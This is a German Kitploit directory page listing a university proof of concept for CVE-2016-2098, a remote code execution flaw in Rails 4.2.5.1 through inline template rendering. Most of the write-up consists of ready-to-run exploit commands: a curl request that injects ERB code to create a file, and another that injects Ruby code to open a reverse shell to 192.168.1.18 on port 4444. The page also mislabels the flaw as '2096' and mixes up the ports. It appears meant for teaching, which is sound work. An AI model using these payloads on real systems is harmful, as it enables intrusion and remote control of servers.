Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
rails-PoC-CVE-2016-2098 — Proof of Concept zu CVE-2016-2098 | Kitploit
Tools/GitHubGitHub/alejandro-marting/rails-poc-cve-2016-2098
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubalejandro-marting/rails-poc-cve-2016-2098

rails-PoC-CVE-2016-2098

Proof of Concept zu CVE-2016-2098

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
1vor 9 JahrenNoch nicht geprüft

Ein Proof of Concept der Sicherheitslücke: CVE-2016-2098

Universitätsprojekt erstellt von @alejandro-marting mit dem wir die Sicherheitslücke 2096 überprüfen können

Verwendet:

  • rails 4.2.5.1
  • View enthält verwundbaren Code: app/views/poc/render1.html.erb

![] (https://github.com/Alejandro-MartinG/rails-PoC-CVE-2016-2098/blob/master/app/assets/images/Captura%20de%20pantalla%20de%202017-01-15%2009:50:23.png)

##Ausführung: Zuerst müssen wir den Rails-Server mit folgendem Befehl starten:

$ rvmsudo rails server -b 0.0.0.0 -p 80

Jetzt können wir die Remote-Code-Ausführung mit dem folgenden Befehl auslösen:

$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'

(Es sollte eine Datei namens 'rooted' erstellt werden)

Wenn du eine Reverse Shell mit Ruby-Code-Injection versuchen möchtest, kannst du den folgenden Befehl ausführen:

root@kitploit:~
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}'  http://localhost:3000/poc/render1

Falls du Fragen hast, kontaktiere mich bitte!

Tool herunterladen